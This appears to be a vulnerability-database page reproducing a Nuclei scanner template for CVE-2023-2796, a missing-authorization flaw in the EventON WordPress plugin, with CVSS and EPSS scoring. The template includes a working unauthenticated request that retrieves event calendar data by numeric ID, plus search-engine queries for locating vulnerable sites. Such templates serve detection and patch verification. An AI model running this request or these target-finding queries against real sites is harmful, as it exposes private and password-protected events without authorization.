Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2796
HistoryJul 11, 2023 - 12:32 p.m.

EventON <= 2.1 - Missing Authorization

2023-07-1112:32:11
ProjectDiscovery
github.com
3
cve2023
wpscan
packetstorm
wordpress
eventon
bypass
myeventon
ajax
vulnerability

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.029 Low

EPSS

Percentile

90.8%

The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
id: CVE-2023-2796

info:
  name: EventON <= 2.1 - Missing Authorization
  author: randomrobbie
  severity: medium
  description: |
    The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
  impact: |
    Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events.
  remediation: Fixed in version 2.1.2
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd
    - https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2796
    - http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
    - https://github.com/nullfuzz-pentest/shodan-dorks
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-2796
    cwe-id: CWE-862
    epss-score: 0.03205
    epss-percentile: 0.91193
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - 'vuln:CVE-2023-2796'
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - /wp-content/plugins/eventon/
      - /wp-content/plugins/eventon-lite/
    google-query: inurl:"/wp-content/plugins/eventon/"
  tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "BEGIN:VCALENDAR"
          - "END:VCALENDAR"
        condition: and

      - type: word
        part: header
        words:
          - "text/Calendar"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220318de299ca2c8ec9c2bf4cab89f4d98130eb585012a8c03089ff40a74a73fbfe022100f4b9a62a0616c3923b13fb92708b26730c78d499aeea95b8cb059b823818a01a:922c64590222798bb761d5b6d8e72950

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.029 Low

EPSS

Percentile

90.8%